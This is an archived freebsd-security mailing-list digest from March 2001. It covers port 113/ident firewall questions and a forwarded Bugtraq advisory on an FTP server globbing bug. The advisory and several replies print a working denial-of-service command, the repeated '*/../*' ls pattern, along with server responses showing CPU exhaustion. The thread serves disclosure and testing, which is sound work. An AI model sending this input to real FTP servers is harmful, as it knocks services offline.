> > >dynamic. Interference with protocols like IPSec is one of the reasons > > >why I'd make a public address a requirement when choising a DSL > > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all > > >possible. Let's hasten the deployment of IPv6. > > > > > > > -snip- > > > > > NAT has proven itself reliable and vital and idiot engineers that design TCP > > protocols that assume everyone has a public IP number are just architecting > > their own failures, and their protocol's subsequent minimizing by the > > market. I have some sympathy for protocols like IPSec that came to be > > during the same time - but organizational-to-organizational IPSec tunnels > > don't have to pass through the NAT - they can terminate on it. But, anyone > > doing a new protocol today is a fool if it can't work though a NAT. > > > > > > > > Ted Mittelstaedt tedm@toybox.placo.com > > Author of: The FreeBSD Corporate Networker's Guide > > Book website: http://www.freebsd-corp-net-guide.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 11:20:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 8065637B719 for ; Thu, 15 Mar 2001 11:20:37 -0800 (PST) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10524; Thu, 15 Mar 2001 12:20:35 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id MAA05688; Thu, 15 Mar 2001 12:20:31 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15025.5630.472269.543769@nomad.yogotech.com> Date: Thu, 15 Mar 2001 12:20:30 -0700 (MST) To: "Ronan Lucio" Cc: Subject: Re: Port 113 In-Reply-To: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Could anybody say me when I need to allow the port 113 > in the firewall? *Need* form auth is a strong word. However, it does tend to speed up email transfers is you enable a version that always responds true. So, any external SMTP servers you have *should* have this port enabled. > What services use this port? I know that SMTP uses it, and I believe that ftpd uses it, and I believe irc also uses it. > For example: I have a computer that is only DNS server, > Does this port need allow connections the to DNS service work? I don't believe so, but someone will certainly correct me if I'm wrong. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 12:21:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from k2.jozsef.kando.hu (k2.jozsef.kando.hu [193.224.40.3]) by hub.freebsd.org (Postfix) with SMTP id A5C5637B719 for ; Thu, 15 Mar 2001 12:21:18 -0800 (PST) (envelope-from bra@fsn.hu) Received: (qmail 10725 invoked by uid 1000); 15 Mar 2001 20:21:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Mar 2001 20:21:16 -0000 Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET) From: Attila Nagy X-X-Sender: To: Subject: Multiple vendors FTP denial of service (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FreeBSD isn't listed, but also vulnerable, at least with the FTPd in -STABLE. ---------- Forwarded message ---------- Date: Thu, 15 Mar 2001 09:34:09 +0100 From: "Frank DENIS (Jedi/Sector One)" To: BUGTRAQ@SECURITYFOCUS.COM Subject: Multiple vendors FTP denial of service - Proftpd built-in 'ls' command has a globbing bug that allows remote denial-of-service. Here's a simple exploit, tested on the Proftpd site : $ ftp ftp.proftpd.org ... Name (ftp.proftpd.org:j): ftp ... 230 Anonymous access granted, restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 Entering Passive Mode (216,10,40,219,4,111). 421 Service not available, remote server timed out. Connection closed That command takes 100% CPU time on the server. It can lead into an easy DOS even if few remote simultanous connections are allowed. Other FTP servers may be concerned as well. Here are various tries : - NetBSD FTP showed the same behavior than Proftpd : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 EPRT command successful. (long delay) 421 Service not available, remote server timed out. Connection closed So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a possible DOS. Other BSD FTP may be affected as well. - Microsoft FTP Service (Version 5.0) seems also confused by the command : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 500 'EPSV': command not understood 227 Entering Passive Mode (207,46,133,140,4,223). 200 PORT command successful. 150 Opening ASCII mode data connection for file list. (very long delay... nothing happens...) - Publicfile refuses the command : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 =131,193,178,181,97,222 550 Sorry, I can't open that file: file does not exist. - Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and displayed. - PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard expression to *" and the 'ls *' output. Maintainers of vulnerable servers have been warned of this bug. -- -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- LINAGORA SA (Paris, France) : http://www.linagora.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 12:35:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 9C0F837B746 for ; Thu, 15 Mar 2001 12:35:18 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id UAA14780; Thu, 15 Mar 2001 20:33:36 GMT Message-ID: <3AB1261F.23B8BE75@algroup.co.uk> Date: Thu, 15 Mar 2001 20:29:19 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Nate Williams Cc: Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams wrote: > > > Could anybody say me when I need to allow the port 113 > > in the firewall? > > *Need* form auth is a strong word. However, it does tend to speed up > email transfers is you enable a version that always responds true. > > So, any external SMTP servers you have *should* have this port enabled. > > > What services use this port? > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe > irc also uses it. smtp does not need to use it - you can achieve the same speedy transfers by telling your smtp server not to bother. e.g. for sendmail: O Timeout.ident=0s > > For example: I have a computer that is only DNS server, > > Does this port need allow connections the to DNS service work? > > I don't believe so, but someone will certainly correct me if I'm wrong. dns does not need ident. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 12:36:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id E0FF737B71A for ; Thu, 15 Mar 2001 12:36:34 -0800 (PST) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA11956; Thu, 15 Mar 2001 13:36:17 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id NAA06986; Thu, 15 Mar 2001 13:36:16 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15025.10176.676792.32675@nomad.yogotech.com> Date: Thu, 15 Mar 2001 13:36:16 -0700 (MST) To: Adam Laurie Cc: Nate Williams , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 In-Reply-To: <3AB1261F.23B8BE75@algroup.co.uk> References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Could anybody say me when I need to allow the port 113 > > > in the firewall? > > > > *Need* form auth is a strong word. However, it does tend to speed up > > email transfers is you enable a version that always responds true. > > > > So, any external SMTP servers you have *should* have this port enabled. > > > > > What services use this port? > > > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe > > irc also uses it. > > smtp does not need to use it - you can achieve the same speedy transfers > by telling your smtp server not to bother. e.g. for sendmail: > > O Timeout.ident=0s My local sendmail doesn't use *my* ident server, but remote sendmail servers use *my* ident server, so using ident locally speeds up mail transfers *to* my host. I certainly don't use ident for local email. :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 12:39:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from satin.team.look.ca (satin.team.look.ca [207.136.94.3]) by hub.freebsd.org (Postfix) with ESMTP id ED95037B71A for ; Thu, 15 Mar 2001 12:39:32 -0800 (PST) (envelope-from JTERLECKI@team.look.ca) Received: by satin.team.look.ca with Internet Mail Service (5.5.2650.21) id ; Thu, 15 Mar 2001 15:45:03 -0500 Message-ID: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look> From: Jason Terlecki To: Ronan Lucio , security@FreeBSD.ORG Subject: RE: Port 113 Date: Thu, 15 Mar 2001 15:39:20 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No, this port is used by identd. Many IRC servers require you to be able = to respond on that port when you connect to it. It allows daemons to determine the username of a connecting client. Jason Terlecki System Analyst - Internet Look Communication - Montreal -----Message d'origine----- De : Ronan Lucio [mailto:ronan@melim.com.br] Envoy=E9 : March 15, 2001 1:19 PM =C0 : security@FreeBSD.ORG Objet : Port 113 Hi all, Could anybody say me when I need to allow the port 113 in the firewall? What services use this port? For example: I have a computer that is only DNS server, Does this port need allow connections the to DNS service work? Thank=B4s Ronan Lucio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message ------------------------------------------------------------------------= - This email server is running an evaluation copy of the MailShield anti- spam software. Please contact your email administrator if you have any questions about this message. MailShield product info: = www.mailshield.com . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 13:41:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from d156h168.resnet.uconn.edu (d156h168.resnet.uconn.edu [137.99.156.168]) by hub.freebsd.org (Postfix) with SMTP id 17BAE37B718 for ; Thu, 15 Mar 2001 13:41:19 -0800 (PST) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 61572 invoked by alias); 15 Mar 2001 21:41:30 -0000 Received: from unknown (HELO sirmoobert) (137.99.158.30) by d156h168.resnet.uconn.edu with SMTP; 15 Mar 2001 21:41:30 -0000 Message-ID: <002301c0ad98$a2677fa0$1e9e6389@137.99.156.23> From: "Peter C. Lai" To: "Ronan Lucio" , References: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look> Subject: Re: Port 113 Date: Thu, 15 Mar 2001 16:41:03 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org many IRC servers also require a valid rdns when doing the ident lookup. I know when I am on a system which has no rdns, identd (port 113) is necessary but not sufficient to let me connect to almost all EFNet servers. ----- Original Message ----- From: "Jason Terlecki" To: "Ronan Lucio" ; Sent: Thursday, March 15, 2001 3:39 PM Subject: RE: Port 113 No, this port is used by identd. Many IRC servers require you to be able to respond on that port when you connect to it. It allows daemons to determine the username of a connecting client. Jason Terlecki System Analyst - Internet Look Communication - Montreal -----Message d'origine----- De : Ronan Lucio [mailto:ronan@melim.com.br] Envoyé : March 15, 2001 1:19 PM À : security@FreeBSD.ORG Objet : Port 113 Hi all, Could anybody say me when I need to allow the port 113 in the firewall? What services use this port? For example: I have a computer that is only DNS server, Does this port need allow connections the to DNS service work? Thank´s Ronan Lucio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message ------------------------------------------------------------------------- This email server is running an evaluation copy of the MailShield anti- spam software. Please contact your email administrator if you have any questions about this message. MailShield product info: www.mailshield.com . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 14: 9:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 6AAB837B71A for ; Thu, 15 Mar 2001 14:09:23 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id XAA62363; Thu, 15 Mar 2001 23:09:17 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: nate@yogotech.com (Nate Williams) Cc: Adam Laurie , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> From: Dag-Erling Smorgrav Date: 15 Mar 2001 23:09:16 +0100 In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 13:36:16 -0700 (MST)" Message-ID: Lines: 13 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: > My local sendmail doesn't use *my* ident server, but remote sendmail > servers use *my* ident server, so using ident locally speeds up mail > transfers *to* my host. No, the problem only arises if you drop TCP 113 SYNs to the floor instead of rejecting them (ipfw deny instead of ipfw reset); the server times out waiting for you to reply. If you send an RST or an ICMP UNREACH back, it'll give up immediately. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 14:12:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 29BD837B719 for ; Thu, 15 Mar 2001 14:12:32 -0800 (PST) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA13545; Thu, 15 Mar 2001 15:11:50 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id PAA07956; Thu, 15 Mar 2001 15:11:49 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15025.15908.270320.373266@nomad.yogotech.com> Date: Thu, 15 Mar 2001 15:11:48 -0700 (MST) To: Dag-Erling Smorgrav Cc: nate@yogotech.com (Nate Williams), Adam Laurie , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 In-Reply-To: References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > My local sendmail doesn't use *my* ident server, but remote sendmail > > servers use *my* ident server, so using ident locally speeds up mail > > transfers *to* my host. > > No, the problem only arises if you drop TCP 113 SYNs to the floor > instead of rejecting them (ipfw deny instead of ipfw reset); the > server times out waiting for you to reply. If you send an RST or an > ICMP UNREACH back, it'll give up immediately. Hmm, I remember a long time ago where it was said (urban legend) that even sending RST's confused older version of mail servers. Running the 'fake' ident server hasn't caused any problems AFAIK. :) :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 14:16:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 57B4237B719 for ; Thu, 15 Mar 2001 14:16:31 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id XAA62454; Thu, 15 Mar 2001 23:16:26 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: nate@yogotech.com (Nate Williams) Cc: Adam Laurie , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> <15025.15908.270320.373266@nomad.yogotech.com> From: Dag-Erling Smorgrav Date: 15 Mar 2001 23:16:25 +0100 In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 15:11:48 -0700 (MST)" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: > Hmm, I remember a long time ago where it was said (urban legend) that > even sending RST's confused older version of mail servers. Huh? Sending an RST results in connect() returning ECONNREFUSED, just like it would if there were no firewall and no identd. Any mail server that can't handle ECONNREFUSED is broken beyond belief. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 14:50: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 67C0B37B719 for ; Thu, 15 Mar 2001 14:49:58 -0800 (PST) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id TAA16613; Thu, 15 Mar 2001 19:50:23 -0300 (ART) From: Fernando Schapachnik Message-Id: <200103152250.TAA16613@ns1.via-net-works.net.ar> Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: "from Attila Nagy at Mar 15, 2001 09:21:16 pm" To: Attila Nagy Date: Thu, 15 Mar 2001 19:50:23 -0300 (ART) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Attila Nagy escribió: > > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in > -STABLE. Sure? With 4.2-REL: Remote system type is UNIX. Using binary mode to transfer files. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 150 Opening ASCII mode data connection for '/bin/ls'. 226 Transfer complete. ftp> ftp> ls 150 Opening ASCII mode data connection for '/bin/ls'. total 13 -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login [Everything normal, I mean] Regards. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 14:58:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 3456E37B718 for ; Thu, 15 Mar 2001 14:58:37 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id OAA51686; Thu, 15 Mar 2001 14:58:01 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200103152258.OAA51686@gndrsh.dnsmgr.net> Subject: Re: Port 113 In-Reply-To: <15025.15908.270320.373266@nomad.yogotech.com> from Nate Williams at "Mar 15, 2001 03:11:48 pm" To: nate@yogotech.com (Nate Williams) Date: Thu, 15 Mar 2001 14:58:00 -0800 (PST) Cc: des@ofug.org (Dag-Erling Smorgrav), adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio), security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > My local sendmail doesn't use *my* ident server, but remote sendmail > > > servers use *my* ident server, so using ident locally speeds up mail > > > transfers *to* my host. > > > > No, the problem only arises if you drop TCP 113 SYNs to the floor > > instead of rejecting them (ipfw deny instead of ipfw reset); the > > server times out waiting for you to reply. If you send an RST or an > > ICMP UNREACH back, it'll give up immediately. > > Hmm, I remember a long time ago where it was said (urban legend) that > even sending RST's confused older version of mail servers. There have been several problems over time with ipfw reset and icmp on FreeBSD not doing the right things. I've seen several commits that look like they may be addressing the problem but have not found the time to test to see if they fixed it. I know from first hand experience that using ipfw reset to try and stop ident requests use to do little to nothing more than ipfw deny. IIRC one of the problems I saw was that the icmp reset packet was created with the address of the ipfw box, which caused it to be ignored by the sending host. Don't know if that ever got fixed or not though. > Running the 'fake' ident server hasn't caused any problems AFAIK. :) :) > > > > > Nate > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15: 0: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from clone.registro.br (clone.REGISTRO.BR [143.108.23.4]) by hub.freebsd.org (Postfix) with ESMTP id 3AC7637B718 for ; Thu, 15 Mar 2001 15:00:00 -0800 (PST) (envelope-from fneves@registro.br) Received: by clone.registro.br (Postfix, from userid 1000) id 1F2C69293; Thu, 15 Mar 2001 19:59:58 -0300 (BRT) Date: Thu, 15 Mar 2001 19:59:58 -0300 From: Frederico A C Neves To: Fernando Schapachnik Cc: Attila Nagy , freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315195957.S78129@registro.br> References: <200103152250.TAA16613@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Thu, Mar 15, 2001 at 07:50:23PM -0300 X-Operating-System: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think so. With 4.2-STABLE in an anonymous session we got 100% CPU until we kill ftpd. On Thu, Mar 15, 2001 at 07:50:23PM -0300, Fernando Schapachnik wrote: > En un mensaje anterior, Attila Nagy escribió: > > > > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in > > -STABLE. > > Sure? > > With 4.2-REL: > > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* > 150 Opening ASCII mode data connection for '/bin/ls'. > 226 Transfer complete. > ftp> > ftp> ls > 150 Opening ASCII mode data connection for '/bin/ls'. > total 13 > -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc > drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm > -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history > -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login > > [Everything normal, I mean] > > > Regards. > > Fernando P. Schapachnik > Administración de la red > VIA NET.WORKS ARGENTINA S.A. > fschapachnik@vianetworks.com.ar > Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Frederico A C Neves Registro .br - R.Pio XI, 1500 +55 11 3838-4130 São Paulo, SP, Brazil - 05468-901 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15:14:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id EFD5B37B719 for ; Thu, 15 Mar 2001 15:14:55 -0800 (PST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2FNEsg62264 for ; Thu, 15 Mar 2001 18:14:54 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010315181354.02a035d0@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 15 Mar 2001 18:14:53 -0500 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar> References: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.1 from Aug 10th is hurt by it. ---Mike At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote: >En un mensaje anterior, Attila Nagy escribi=F3: > > > > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in > > -STABLE. > >Sure? > >With 4.2-REL: > >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >150 Opening ASCII mode data connection for '/bin/ls'. >226 Transfer complete. >ftp> >ftp> ls >150 Opening ASCII mode data connection for '/bin/ls'. >total 13 >-rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc >drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm >-rw------- 1 fpscha wheel 1517 20 feb 09:28 .history >-rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login > >[Everything normal, I mean] > > >Regards. > >Fernando P. Schapachnik >Administraci=F3n de la red >VIA NET.WORKS ARGENTINA S.A. >fschapachnik@vianetworks.com.ar >Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 